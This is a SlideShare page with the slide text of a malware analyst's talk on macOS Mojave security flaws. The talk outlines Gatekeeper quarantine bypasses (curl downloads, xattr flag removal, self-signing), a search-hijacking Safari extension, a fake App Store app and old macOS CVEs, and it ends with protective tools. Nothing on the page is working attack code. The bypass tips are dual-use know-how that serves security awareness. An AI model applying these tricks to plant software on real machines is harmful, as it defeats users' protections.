SlideShare a Scribd company logo

MacOS Mojave Security Issues

Download as PPTX, PDF
V
VitaliyMechytashvili

No description

Technology
1 of 29
Mojave Security Flaws Or their issues
>Whoami Vitaliy Mechytashvili. Malware Analyst with Under Defense LLC vim@underdefense.com https://twitter.com/myautd https://t.me/myautd 2
Agenda MacOS 10.14 have done a lot of security improvements but there are few secrets you have to know, like Gatekeeper bypass, installation sources bypass and many other tricks to infect your MacOS 3
Security Features ● Mojave security updates. ● Gatekeeper ● App Store ● Safari Extensions ● Trusted installation source ● CVE’s 4
MacOS Mojave Security Updates Release Date: 24 September 2018. ● Control of Your privacy: ○ Requires approval before application access to your camera or microphone ○ Also requires approval before access to application with personal data, like Mail, Contacts, etc ● Safari improvements: ○ Enhanced Tracking Prevention ○ Built-in password manager ○ Extensions can be installed only from trusted store 5
Control of privacy This update really protects users from potentially privacy disclosure. For real, this is only security thing in MacOS that is working properly. What for real your privacy costs for Apple? 6
Authorization bypass Authorization.h сomment and trampolineClient.cpp code, both source codes available on opensource.apple.com 7
● Apps are “quarantined” when downloaded ● Gatekeeper checks signature only for quarantined apps ● After app is opened - quarantine flag is removed ● Code signature is never checked again 8 Code signing flow
9 Gatekeeper bypass ● Applications downloaded with curl are never quarantined ● Whenever checksum of application is changed, it still isn’t quarantined ● Malware can remove quarantine flag using xcode “xattr” command ● Dropper can sign any application with own certificate
Gatekeeper signatures database ● Anyone can get valid developer signature ● Signatures are revoked after user report abuse to Apple ● Signatures updates on user’s endpoints two times per year 10
App Store Trusted mac application store. Or not? “AppStore contains sandbox which is validate application before it appears available for users” How does sandboxing work for real? This is an example of search hijacker, first appeared in Extensions store more than half of year ago. 11
Adware Doctor This is fake “Adware Doctor” which collects user personal data. Top 4 Canada, Top 1 US AppStore in paid applications. Manual dynamic analysis workshop from @DC38032 Community available on YT: https://www.youtube.com/watch?v=B-XELDUtaa8 12
Safari Extensions Store How to contribute to app store: ● You should clearly and accurately disclose what extensions are made available in the app’s marketing text and the extensions may not include marketing, advertising or in-app purchases. ● They may not interfere with System or Safari UI elements and must never include malicious or misleading content or code. ● Apple reviews all extensions and updates to ensure they work reliably. 13
How does the Extensions Store work Search Manager. It manually changes your homepage, new tab and default search manager to yahoo. Works only in targeted countries. Indicators of compromise: ● Disallow change search service and homepage manually through preferences. ● Collecting search terms for advertisements suggestions ● Doesn’t show any search result, only advertisements and promotions. 14
Search Manager LLC UnderDefense15
Search redirecting Using build in browser features “beforeSearch”, “beforeNavigate”. Hijack user search term, replaces search service url to own. 16
Browsing History Each time user opens any url, this extension catches information like web-page title and url. Then it sends this info to its own server 17
Trusted installation source From macOS Mojave (10.14), by default user can install applications and extensions only from AppStore and Extensions Store. ● Extension which is installing on users system should be code-signed. ● Extension can be only installed from safari extensions store ● Extension shouldn’t violate AppStore criterias. 18
Easy to bypass 26 lines of apple-script to install malicious extension on your system: Easy to implement and quite difficult to detect. ● Developer features can be turned off ● Extension can be placed not only in default path 19
Malware Carriers/Droppers Adobe_Flash_Player_Installer_1337.dmg. Go ahead and install everything, you download 20
CVE List According to all times CVE-stats, Mac OS is TOP-4 Vulnerable OS. 21
CVE List According to all-time CVE-stats, Mac OS is TOP-4 Vulnerable OS. Link: https://www.cvedetails.com/top-50-products.php?year=0 22
0-day exploit prices 23
CVE-2017-7149: Password Exposure Apple Encrypted Volumes hint contains encryption password 24
CVE-2017-7170: Privilege Escalation 0-day discovered by Patrick Wardle (Objective See), Secure authentication boxes stores password in tmpfile() tmpfile() creates random named file in /tmp/ 25
CVE-2017-13872: #iamroot Click “enter” two times to get root In macOS Sierra, you can bypass authentication by changing username to “root” And pressing “Enter” two times LLC UnderDefense26
How to protect yourself ● Objective-See (https://objective-see.com) ○ Knock-Knock ○ Block-Block ● Google Santa ● Any antivirus, which is not doing ML while your disk gets fully encrypted ○ BitDefender ○ MacKeeper ○ Malwarebytes ○ Norton 27
How to protect yourself ● Objective-See (https://objective-see.com) ○ Knock-Knock ○ Block-Block ● Google Santa ● Any antivirus is better than nothing ○ BitDefender ○ MacKeeper ○ Malwarebytes ○ Norton 28
Thank you! Ukraine Lviv Heroiv UPA 73 k.38, Lviv, 79014 Tel: +38 063 11 357 66 email: help@underdefense.com Poland Wrocław Rzeźnicza str. 28-31, 50-130 Tel: +48 881 300 889 email: help@underdefense.com Malta Birkirkara 170, Pater House, Psaila St, BKR 9077, Tel: +356 2759 5000 email: help@underdefense.com USA New York 375 Park Avenue, Suite 2800, NY Tel: +1 929 999 5101 email: help@underdefense.com 29

Recommended

How to remove presto savings
How to remove presto savingsHow to remove presto savings
How to remove presto savings
MU
 
HackStore
HackStoreHackStore
HackStore
Anton Ingachev
 
Delete fb downloader search
Delete fb downloader searchDelete fb downloader search
Delete fb downloader search
christaldisouza1
 
How to remove search.gomaps.co
How to remove search.gomaps.coHow to remove search.gomaps.co
How to remove search.gomaps.co
haroNaroum
 
How to remove vafmusic manually
How to remove vafmusic manuallyHow to remove vafmusic manually
How to remove vafmusic manually
haroNaroum
 
Top ways to uninstall yourtv.link ads
Top ways to uninstall yourtv.link adsTop ways to uninstall yourtv.link ads
Top ways to uninstall yourtv.link ads
haroNaroum
 
How to Uninstall Malwares-assistance.net from PC
How to Uninstall Malwares-assistance.net from PCHow to Uninstall Malwares-assistance.net from PC
How to Uninstall Malwares-assistance.net from PC
Ashok Albert
 
How to remove search quick.com
How to remove search quick.comHow to remove search quick.com
How to remove search quick.com
jesicasruma
 

Recommended

How to remove presto savings
How to remove presto savingsHow to remove presto savings
How to remove presto savings
MU
 
HackStore
HackStoreHackStore
HackStore
Anton Ingachev
 
Delete fb downloader search
Delete fb downloader searchDelete fb downloader search
Delete fb downloader search
christaldisouza1
 
How to remove search.gomaps.co
How to remove search.gomaps.coHow to remove search.gomaps.co
How to remove search.gomaps.co
haroNaroum
 
How to remove vafmusic manually
How to remove vafmusic manuallyHow to remove vafmusic manually
How to remove vafmusic manually
haroNaroum
 
Top ways to uninstall yourtv.link ads
Top ways to uninstall yourtv.link adsTop ways to uninstall yourtv.link ads
Top ways to uninstall yourtv.link ads
haroNaroum
 
How to Uninstall Malwares-assistance.net from PC
How to Uninstall Malwares-assistance.net from PCHow to Uninstall Malwares-assistance.net from PC
How to Uninstall Malwares-assistance.net from PC
Ashok Albert
 
How to remove search quick.com
How to remove search quick.comHow to remove search quick.com
How to remove search quick.com
jesicasruma
 
Recover lost contacts from iphone
Recover lost contacts from iphoneRecover lost contacts from iphone
Recover lost contacts from iphone
georgefinley
 
Remove asearchonline.com manually for free
Remove asearchonline.com manually for freeRemove asearchonline.com manually for free
Remove asearchonline.com manually for free
haroNaroum
 
Remove mystart3.dealwifi.com redirect virus
Remove mystart3.dealwifi.com redirect virusRemove mystart3.dealwifi.com redirect virus
Remove mystart3.dealwifi.com redirect virus
coseanonans
 
Uninstall searchpassage.com – searchpassage.com removal guide
Uninstall searchpassage.com – searchpassage.com removal guideUninstall searchpassage.com – searchpassage.com removal guide
Uninstall searchpassage.com – searchpassage.com removal guide
coseanonans
 
WordPress Troubleshooting Hacks.pdf
WordPress Troubleshooting Hacks.pdfWordPress Troubleshooting Hacks.pdf
WordPress Troubleshooting Hacks.pdf
Arthur Kasirye
 
How to update software on Mac
How to update software on MacHow to update software on Mac
How to update software on Mac
Asya Karapetyan
 
How to remove yeabd66.cc
How to remove yeabd66.ccHow to remove yeabd66.cc
How to remove yeabd66.cc
haroNaroum
 
Small Business Cyber Security Checklist
Small Business Cyber Security ChecklistSmall Business Cyber Security Checklist
Small Business Cyber Security Checklist
Gabriel Friedlander
 
Using the restful twitter’s api
Using the restful twitter’s apiUsing the restful twitter’s api
Using the restful twitter’s api
Idriss Neumann
 
How to remove cassiopesa from ie firefox chrome
How to remove cassiopesa from ie firefox chromeHow to remove cassiopesa from ie firefox chrome
How to remove cassiopesa from ie firefox chrome
haroNaroum
 
Uninstall searchz.co – how to remove searchz.co
Uninstall searchz.co – how to remove searchz.coUninstall searchz.co – how to remove searchz.co
Uninstall searchz.co – how to remove searchz.co
haroNaroum
 
Flutter Android / iOS Build Preparation
Flutter Android / iOS Build PreparationFlutter Android / iOS Build Preparation
Flutter Android / iOS Build Preparation
9 series
 
Assingment 3 - Bug bounty
Assingment 3 - Bug bountyAssingment 3 - Bug bounty
Assingment 3 - Bug bounty
Jeewanthi Fernando
 
Introduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingIntroduction to Web Application Penetration Testing
Introduction to Web Application Penetration Testing
Rana Khalil
 
Why should you do a pentest?
Why should you do a pentest?Why should you do a pentest?
Why should you do a pentest?
Abraham Aranguren
 
How to remove smart shopsave.com
How to remove smart shopsave.comHow to remove smart shopsave.com
How to remove smart shopsave.com
coseanonans
 
Android malware presentation
Android malware presentationAndroid malware presentation
Android malware presentation
Sandeep Joshi
 
Web Application Penetration Tests - Vulnerability Identification and Details ...
Web Application Penetration Tests - Vulnerability Identification and Details ...Web Application Penetration Tests - Vulnerability Identification and Details ...
Web Application Penetration Tests - Vulnerability Identification and Details ...
Netsparker
 
Bug Bounty #Defconlucknow2016
Bug Bounty #Defconlucknow2016Bug Bounty #Defconlucknow2016
Bug Bounty #Defconlucknow2016
Shubham Gupta
 
[MBF2] Webinar API Orange Partner #2
[MBF2] Webinar API Orange Partner #2[MBF2] Webinar API Orange Partner #2
[MBF2] Webinar API Orange Partner #2
BeMyApp
 
Anti-tampering in Android and Take Look at Google SafetyNet Attestation API
Anti-tampering in Android and Take Look at Google SafetyNet Attestation APIAnti-tampering in Android and Take Look at Google SafetyNet Attestation API
Anti-tampering in Android and Take Look at Google SafetyNet Attestation API
Arash Ramez
 
The Future of Web Apps
The Future of Web AppsThe Future of Web Apps
The Future of Web Apps
iCiDIGITAL
 

More Related Content

What's hot

Uninstall searchz.co – how to remove searchz.co
Uninstall searchz.co – how to remove searchz.coUninstall searchz.co – how to remove searchz.co
Uninstall searchz.co – how to remove searchz.co
haroNaroum
 

What's hot (11)

Recover lost contacts from iphone
Recover lost contacts from iphoneRecover lost contacts from iphone
Recover lost contacts from iphone
 
Remove asearchonline.com manually for free
Remove asearchonline.com manually for freeRemove asearchonline.com manually for free
Remove asearchonline.com manually for free
 
Remove mystart3.dealwifi.com redirect virus
Remove mystart3.dealwifi.com redirect virusRemove mystart3.dealwifi.com redirect virus
Remove mystart3.dealwifi.com redirect virus
 
Uninstall searchpassage.com – searchpassage.com removal guide
Uninstall searchpassage.com – searchpassage.com removal guideUninstall searchpassage.com – searchpassage.com removal guide
Uninstall searchpassage.com – searchpassage.com removal guide
 
WordPress Troubleshooting Hacks.pdf
WordPress Troubleshooting Hacks.pdfWordPress Troubleshooting Hacks.pdf
WordPress Troubleshooting Hacks.pdf
 
How to update software on Mac
How to update software on MacHow to update software on Mac
How to update software on Mac
 
How to remove yeabd66.cc
How to remove yeabd66.ccHow to remove yeabd66.cc
How to remove yeabd66.cc
 
Small Business Cyber Security Checklist
Small Business Cyber Security ChecklistSmall Business Cyber Security Checklist
Small Business Cyber Security Checklist
 
Using the restful twitter’s api
Using the restful twitter’s apiUsing the restful twitter’s api
Using the restful twitter’s api
 
How to remove cassiopesa from ie firefox chrome
How to remove cassiopesa from ie firefox chromeHow to remove cassiopesa from ie firefox chrome
How to remove cassiopesa from ie firefox chrome
 
Uninstall searchz.co – how to remove searchz.co
Uninstall searchz.co – how to remove searchz.coUninstall searchz.co – how to remove searchz.co
Uninstall searchz.co – how to remove searchz.co
 

Similar to MacOS Mojave Security Issues

Dreamweaver cs5 read me
Dreamweaver cs5 read meDreamweaver cs5 read me
Dreamweaver cs5 read me
Php RedStorm
 
AWS UG Warsaw & Serverless warsztatowo! 19.09.2019 | Hillel Solow's presentation
AWS UG Warsaw & Serverless warsztatowo! 19.09.2019 | Hillel Solow's presentationAWS UG Warsaw & Serverless warsztatowo! 19.09.2019 | Hillel Solow's presentation
AWS UG Warsaw & Serverless warsztatowo! 19.09.2019 | Hillel Solow's presentation
Serverless User Group Poland
 

Similar to MacOS Mojave Security Issues (20)

Flutter Android / iOS Build Preparation
Flutter Android / iOS Build PreparationFlutter Android / iOS Build Preparation
Flutter Android / iOS Build Preparation
 
Assingment 3 - Bug bounty
Assingment 3 - Bug bountyAssingment 3 - Bug bounty
Assingment 3 - Bug bounty
 
Introduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingIntroduction to Web Application Penetration Testing
Introduction to Web Application Penetration Testing
 
Why should you do a pentest?
Why should you do a pentest?Why should you do a pentest?
Why should you do a pentest?
 
How to remove smart shopsave.com
How to remove smart shopsave.comHow to remove smart shopsave.com
How to remove smart shopsave.com
 
Android malware presentation
Android malware presentationAndroid malware presentation
Android malware presentation
 
Web Application Penetration Tests - Vulnerability Identification and Details ...
Web Application Penetration Tests - Vulnerability Identification and Details ...Web Application Penetration Tests - Vulnerability Identification and Details ...
Web Application Penetration Tests - Vulnerability Identification and Details ...
 
Bug Bounty #Defconlucknow2016
Bug Bounty #Defconlucknow2016Bug Bounty #Defconlucknow2016
Bug Bounty #Defconlucknow2016
 
[MBF2] Webinar API Orange Partner #2
[MBF2] Webinar API Orange Partner #2[MBF2] Webinar API Orange Partner #2
[MBF2] Webinar API Orange Partner #2
 
Anti-tampering in Android and Take Look at Google SafetyNet Attestation API
Anti-tampering in Android and Take Look at Google SafetyNet Attestation APIAnti-tampering in Android and Take Look at Google SafetyNet Attestation API
Anti-tampering in Android and Take Look at Google SafetyNet Attestation API
 
The Future of Web Apps
The Future of Web AppsThe Future of Web Apps
The Future of Web Apps
 
AppCoins @ CoinAdvice (4 Mar 2019)
AppCoins @ CoinAdvice (4 Mar 2019)AppCoins @ CoinAdvice (4 Mar 2019)
AppCoins @ CoinAdvice (4 Mar 2019)
 
Dreamweaver cs5 read me
Dreamweaver cs5 read meDreamweaver cs5 read me
Dreamweaver cs5 read me
 
Dreamweaver cs5 read me
Dreamweaver cs5 read meDreamweaver cs5 read me
Dreamweaver cs5 read me
 
Module 12 (web application vulnerabilities)
Module 12 (web application vulnerabilities)Module 12 (web application vulnerabilities)
Module 12 (web application vulnerabilities)
 
Spyware
SpywareSpyware
Spyware
 
Formación en movilidad: Conceptos de desarrollo en iOS (V)
Formación en movilidad: Conceptos de desarrollo en iOS (V) Formación en movilidad: Conceptos de desarrollo en iOS (V)
Formación en movilidad: Conceptos de desarrollo en iOS (V)
 
AWS UG Warsaw & Serverless warsztatowo! 19.09.2019 | Hillel Solow's presentation
AWS UG Warsaw & Serverless warsztatowo! 19.09.2019 | Hillel Solow's presentationAWS UG Warsaw & Serverless warsztatowo! 19.09.2019 | Hillel Solow's presentation
AWS UG Warsaw & Serverless warsztatowo! 19.09.2019 | Hillel Solow's presentation
 
"Don’t Run with Scissors: Serverless Security Survival Guide" | Hillel Solow,...
"Don’t Run with Scissors: Serverless Security Survival Guide" | Hillel Solow,..."Don’t Run with Scissors: Serverless Security Survival Guide" | Hillel Solow,...
"Don’t Run with Scissors: Serverless Security Survival Guide" | Hillel Solow,...
 
Session10-PHP Misconfiguration
Session10-PHP MisconfigurationSession10-PHP Misconfiguration
Session10-PHP Misconfiguration
 

Recently uploaded

Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
sammart93
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
Enterprise Knowledge
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
Delhi Call girls
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
Joaquim Jorge
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Igalia
 

Recently uploaded (20)

Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdf
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
Tech Trends Report 2024 Future Today Institute.pdf
Tech Trends Report 2024 Future Today Institute.pdfTech Trends Report 2024 Future Today Institute.pdf
Tech Trends Report 2024 Future Today Institute.pdf
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Evaluating the top large language models.pdf
Evaluating the top large language models.pdfEvaluating the top large language models.pdf
Evaluating the top large language models.pdf
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
 

MacOS Mojave Security Issues

  • 2. >Whoami Vitaliy Mechytashvili. Malware Analyst with Under Defense LLC vim@underdefense.com https://twitter.com/myautd https://t.me/myautd 2
  • 3. Agenda MacOS 10.14 have done a lot of security improvements but there are few secrets you have to know, like Gatekeeper bypass, installation sources bypass and many other tricks to infect your MacOS 3
  • 4. Security Features ● Mojave security updates. ● Gatekeeper ● App Store ● Safari Extensions ● Trusted installation source ● CVE’s 4
  • 5. MacOS Mojave Security Updates Release Date: 24 September 2018. ● Control of Your privacy: ○ Requires approval before application access to your camera or microphone ○ Also requires approval before access to application with personal data, like Mail, Contacts, etc ● Safari improvements: ○ Enhanced Tracking Prevention ○ Built-in password manager ○ Extensions can be installed only from trusted store 5
  • 6. Control of privacy This update really protects users from potentially privacy disclosure. For real, this is only security thing in MacOS that is working properly. What for real your privacy costs for Apple? 6
  • 7. Authorization bypass Authorization.h сomment and trampolineClient.cpp code, both source codes available on opensource.apple.com 7
  • 8. ● Apps are “quarantined” when downloaded ● Gatekeeper checks signature only for quarantined apps ● After app is opened - quarantine flag is removed ● Code signature is never checked again 8 Code signing flow
  • 9. 9 Gatekeeper bypass ● Applications downloaded with curl are never quarantined ● Whenever checksum of application is changed, it still isn’t quarantined ● Malware can remove quarantine flag using xcode “xattr” command ● Dropper can sign any application with own certificate
  • 10. Gatekeeper signatures database ● Anyone can get valid developer signature ● Signatures are revoked after user report abuse to Apple ● Signatures updates on user’s endpoints two times per year 10
  • 11. App Store Trusted mac application store. Or not? “AppStore contains sandbox which is validate application before it appears available for users” How does sandboxing work for real? This is an example of search hijacker, first appeared in Extensions store more than half of year ago. 11
  • 12. Adware Doctor This is fake “Adware Doctor” which collects user personal data. Top 4 Canada, Top 1 US AppStore in paid applications. Manual dynamic analysis workshop from @DC38032 Community available on YT: https://www.youtube.com/watch?v=B-XELDUtaa8 12
  • 13. Safari Extensions Store How to contribute to app store: ● You should clearly and accurately disclose what extensions are made available in the app’s marketing text and the extensions may not include marketing, advertising or in-app purchases. ● They may not interfere with System or Safari UI elements and must never include malicious or misleading content or code. ● Apple reviews all extensions and updates to ensure they work reliably. 13
  • 14. How does the Extensions Store work Search Manager. It manually changes your homepage, new tab and default search manager to yahoo. Works only in targeted countries. Indicators of compromise: ● Disallow change search service and homepage manually through preferences. ● Collecting search terms for advertisements suggestions ● Doesn’t show any search result, only advertisements and promotions. 14
  • 16. Search redirecting Using build in browser features “beforeSearch”, “beforeNavigate”. Hijack user search term, replaces search service url to own. 16
  • 17. Browsing History Each time user opens any url, this extension catches information like web-page title and url. Then it sends this info to its own server 17
  • 18. Trusted installation source From macOS Mojave (10.14), by default user can install applications and extensions only from AppStore and Extensions Store. ● Extension which is installing on users system should be code-signed. ● Extension can be only installed from safari extensions store ● Extension shouldn’t violate AppStore criterias. 18
  • 19. Easy to bypass 26 lines of apple-script to install malicious extension on your system: Easy to implement and quite difficult to detect. ● Developer features can be turned off ● Extension can be placed not only in default path 19
  • 20. Malware Carriers/Droppers Adobe_Flash_Player_Installer_1337.dmg. Go ahead and install everything, you download 20
  • 21. CVE List According to all times CVE-stats, Mac OS is TOP-4 Vulnerable OS. 21
  • 22. CVE List According to all-time CVE-stats, Mac OS is TOP-4 Vulnerable OS. Link: https://www.cvedetails.com/top-50-products.php?year=0 22
  • 24. CVE-2017-7149: Password Exposure Apple Encrypted Volumes hint contains encryption password 24
  • 25. CVE-2017-7170: Privilege Escalation 0-day discovered by Patrick Wardle (Objective See), Secure authentication boxes stores password in tmpfile() tmpfile() creates random named file in /tmp/ 25
  • 26. CVE-2017-13872: #iamroot Click “enter” two times to get root In macOS Sierra, you can bypass authentication by changing username to “root” And pressing “Enter” two times LLC UnderDefense26
  • 27. How to protect yourself ● Objective-See (https://objective-see.com) ○ Knock-Knock ○ Block-Block ● Google Santa ● Any antivirus, which is not doing ML while your disk gets fully encrypted ○ BitDefender ○ MacKeeper ○ Malwarebytes ○ Norton 27
  • 28. How to protect yourself ● Objective-See (https://objective-see.com) ○ Knock-Knock ○ Block-Block ● Google Santa ● Any antivirus is better than nothing ○ BitDefender ○ MacKeeper ○ Malwarebytes ○ Norton 28
  • 29. Thank you! Ukraine Lviv Heroiv UPA 73 k.38, Lviv, 79014 Tel: +38 063 11 357 66 email: help@underdefense.com Poland Wrocław Rzeźnicza str. 28-31, 50-130 Tel: +48 881 300 889 email: help@underdefense.com Malta Birkirkara 170, Pater House, Psaila St, BKR 9077, Tel: +356 2759 5000 email: help@underdefense.com USA New York 375 Park Avenue, Suite 2800, NY Tel: +1 929 999 5101 email: help@underdefense.com 29

Editor's Notes

  1. https://www.youtube.com/watch?v=B-XELDUtaa8